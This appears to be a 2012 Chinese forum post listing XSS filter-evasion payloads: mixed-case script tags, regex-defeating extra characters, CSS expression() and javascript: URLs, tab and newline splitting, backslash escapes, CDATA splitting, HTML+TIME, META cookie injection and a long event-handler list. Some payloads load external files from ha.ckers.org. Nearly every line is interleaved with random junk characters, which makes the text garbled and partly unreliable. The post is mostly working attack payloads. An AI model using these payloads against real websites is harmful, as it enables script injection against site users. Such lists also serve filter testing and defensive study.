1. 改变字符大小写
' B$ j, L# B2 r) N4 C4 z3 d
* m" |" U% w! Y
% {* J3 I( t" @/ ~$ O( F1 k4 Y: j7 _6 O- l" s! A" T2 o! Z( _# @4 H
<sCript>alert(‘d’)</scRipT>
9 v' t' l/ I5 n' G0 j6 a- y+ g
/ O" O; Q9 ~7 T, Y3 h* e/ y2. 利用多加一些其它字符来规避Regular Expression的检查
2 C, _' \' X+ R4 ^9 I- d1 s# N
" _. g' x' U3 U3 R: m( E2 K <<script>alert(‘c’)//<</script>- J$ S! M/ ^. }. }; E+ K, ]
5 ?* c4 s, k3 T3 ~8 j# y <SCRIPT a=">" SRC="t.js"></SCRIPT>
. u% {, R' K/ m: Y5 s- p9 F) r- |$ c0 m& d! m% M- g
<SCRIPT =">" SRC="t.js"></SCRIPT>
. E( L" _# T8 g' {! C# M" K; W# s- d
8 z9 I) T; ^* ]. L <SCRIPT a=">" ” SRC="t.js"></SCRIPT>, U" G/ g5 x" ~7 V. B
5 J4 i* ^" v9 H L5 ~$ U7 y7 _; L2 O <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>+ n e+ ~# b" h/ b; s( b7 W
# O1 R0 M \- N" l/ c9 q7 r <SCRIPT a=`>` SRC="t.js"></SCRIPT>' R) O4 Y) N4 H- ?, q& ~2 F
. M5 @' L+ c! \6 Q9 S3 e5 z! w <SCRIPT a=">’>" SRC="t.js"></SCRIPT>$ o6 W+ d: ]/ A, i5 I- m) u3 h2 _
* T8 ], d' W) C" N' \+ n! v
3. 以其它扩展名取代.js
1 u+ \5 m; N/ }' {* j! }0 | f) R
5 [& ]% {/ y3 N: E5 r <script src="bad.jpg"></script> J, o2 z/ c D9 `0 e& p3 i
$ @1 v- Y+ q6 V6 G0 J2 u4. 将Javascript写在CSS档里6 W4 m1 C6 i9 v. c" V
3 e+ v, m" B4 C$ Y4 Z C( W
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">3 K, j. v% Z% {
5 n2 `* l$ x" m# P( C% Y
example:0 f% F, ]0 b& t" V/ m1 b
5 r7 i0 `; p# G& R! {3 h
body {! u0 a6 b% \4 U9 X
% W. o. `1 j# p: W4 Z: ^4 D; r3 f background-image: url(‘javascript:alert("XSS");’)
' }8 ?% v5 X/ W7 F
" b& J/ w% J6 n/ ~7 b }3 p5 H: a. e1 V7 }& F
' k' C' N Z. X/ t9 D$ s4 V& K3 n5. 在script的tag里加入一些其它字符
+ }& c7 h; n2 t" T* K* K% f: a
% K$ d# s1 ?' v3 V$ l& { <SCRIPT/SRC="t.js"></SCRIPT>5 G- V+ a5 m% r
3 o3 M8 O5 c' y. s <SCRIPT/anyword SRC="t.js"></SCRIPT>
9 v( E! x4 l7 Q0 @
, `; O. t5 f) z: Z2 i; _6. 使用tab或是new line来规避
4 P* J9 ?' z' e7 C# {1 D' A0 n
- H$ C5 X$ T6 F5 ^: q# @! a# c+ h <img src="jav ascr ipt:alert(‘XSS3′)">* F8 V' a _$ a- ]% o" H
& {3 u; d8 ~$ s4 f3 K' e <img src="jav ascr ipt:alert(‘XSS3′)">* @" y, J/ W0 s5 I$ w
: ]" F' E& W* x" }5 i
<IMG SRC="jav ascript:alert(‘XSS’);">
- _$ N; W6 q0 m6 o' u
$ `; m4 G; ^6 \; C# M -> tag
% i8 w! U3 M! o7 C& x8 I' l, ^4 D2 K& S: l0 W8 J
-> new line2 ^9 d* ]6 }* r L4 D& G3 }8 q1 j, F2 Q
3 t0 w4 c2 m8 b7. 使用"\"来规避
, A) l C1 @& v& H
2 C, }3 Q D4 B+ G3 `! ? <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
$ w' b6 Y _$ [& x: |5 R6 ^. |6 L* k; a" T( ^4 Y
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
- a7 b: t8 B- q0 o
7 P: E& @; P0 G# Y8 i5 \ <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
3 E8 F+ y" ]- ^! C6 e5 e+ o/ U+ t
# [7 a" H! {4 B1 d <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">! G* b" F' y, z1 |
/ c3 \% Y J. b8 V) I
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>6 ]* I+ ^$ ]. q( X+ [5 n2 D
# f8 k$ N* y* L' K1 n
8. 使用Hex encode来规避(也可能会把";"拿掉)
! W9 d8 \ s8 U4 l3 J+ p
3 ?0 W& d5 H/ `6 b2 Z% l1 u& Z <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
1 ~3 D2 l: |8 @$ U. s/ A5 ?
& f; ?; m! q& M3 b 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">) F! x6 v! _( I3 j* Z1 N
4 l0 x8 }/ J0 \ y
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">7 x6 p0 ~! w% c0 ~
; y b1 Z7 f: E 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
% X( Y% _7 v- N! F+ t* |( ?* M7 X) @3 v
9. script in HTML tag
( G* B% Y# e( I
" n, R# `' [- v- M6 Q% n <body onload=」alert(‘onload’)」>' t/ M% R9 g8 k; O
$ k$ k% G) N) ^4 K* q2 ?1 C- X3 L2 R. V# s onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload; n# Z) I0 h9 w" A
5 [1 `, R4 W$ q9 R
10. 在swf里含有xss的code' d, \9 U' ?$ e m& A- I3 [% _
0 N4 I+ g. m0 K7 |$ L" v <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
) D% `; M' S7 X" r; H- b6 t5 Z8 B, ]7 L" h
11. 利用CDATA将xss的code拆开,再组合起来。
; _$ c/ U' x( }2 t9 n' {/ L6 v
% O' x% E8 c' f! o% r <XML ID=I><X><C>! G& _) [, e: B- U! R
5 u# B& h: R" L
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>: f3 j) f. s( A3 M4 j3 {8 g3 d
( t9 P6 q. {7 r% @ </C></X>
5 B. i" Q/ {, b: E/ p6 R. G4 F* g6 Y. s
</xml>
$ i, p. D) v, B- @8 B* E8 \ n- k% X" A: P3 X
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>" g" X5 }( x" o6 O" q
! ^; q: X/ T' _; @3 E( h
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>& V; |" m4 B# }$ L. X- i6 c8 {6 E* ?
( g! e/ _6 F8 R4 L( G0 V& L <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
+ d$ S6 w8 g0 ?2 L% C/ z5 G
; A$ V) X3 `# N; E12. 利用HTML+TIME。& g$ ]( t! a! B
/ h; F. ^5 u; F. d6 _ T
<HTML><BODY>5 v& i6 G0 I" _4 _' c
+ p L c# [- |1 q; x M
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">0 \2 `4 Y. Z4 W4 _9 y& ]
/ J2 y4 e/ c2 W2 Q
<?import namespace="t" implementation="#default#time2">$ [; g+ Y. K4 i. `1 C
( q1 z3 \! L8 a b <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">3 c% d/ E. {" V) R/ `4 f1 h6 o& ]
! g9 b; {8 h) k, o1 B1 A/ i </BODY></HTML>
/ _2 q! Y# C Z" g, ~! d+ }& \. Y& L3 y: C) B
13. 透过META写入Cookie。
3 y" ^( B+ L0 h" b2 n3 G. k- X9 Q! w
$ h" D* A$ q) E3 R" h <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
6 w8 \# p# X4 p6 A6 s7 j
. b) p3 o' a( o8 E; d; U* L14. javascript in src , href , url
8 H5 Y' X+ e$ B+ l! N; p _+ D+ ]* h& R9 g- ]
<IFRAME SRC=javascript:alert(’13′)></IFRAME>. I6 g0 S1 e# m, h
, n: E# L0 z4 c <img src="javascript:alert(‘XSS3′)"> K, Z C7 n4 ^- C
0 y- D$ x( K% F1 R- m9 W' L<IMG DYNSRC="javascript:alert(‘XSS20′)">$ n! r! o2 g1 W* A% Z) ]( D
; z0 ?1 A/ @2 {6 N4 D" }8 D, Z& {
<IMG LOWSRC="javascript:alert(‘XSS21′)">
" Q. e* u# _! g* D
; V% b; g+ [1 T3 l2 M8 t* _0 h <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">! Q( }5 \* p8 G; X) U) i
$ Q7 b! \' s# _* z <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>5 [* y9 `; [7 a. t: m) b) g# s
% T6 P$ [# h6 Y# r0 [7 O: V <TABLE BACKGROUND="javascript:alert(‘XSS29′)">
0 N8 R5 Z, {+ w4 ?' d& T _7 k2 L/ c% B" @, Y* B
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
% M: }8 K' J" O6 T- k8 {9 V1 j
6 A; P+ W* ?6 e3 c6 W <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
% `* X1 e3 `/ V2 M9 l9 y9 f0 R7 f' E/ e E' ^1 B
</STYLE><A CLASS=XSS></A>
" e5 H4 f& p9 t9 b
9 S9 F9 j& T _3 b4 d" a8 R" ]: c <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>; M! U/ w5 E9 w
2 U5 F7 p: k9 @: D/ {' ~" V |
发表于 2012-12-31 09:59:28
收藏
支持
反对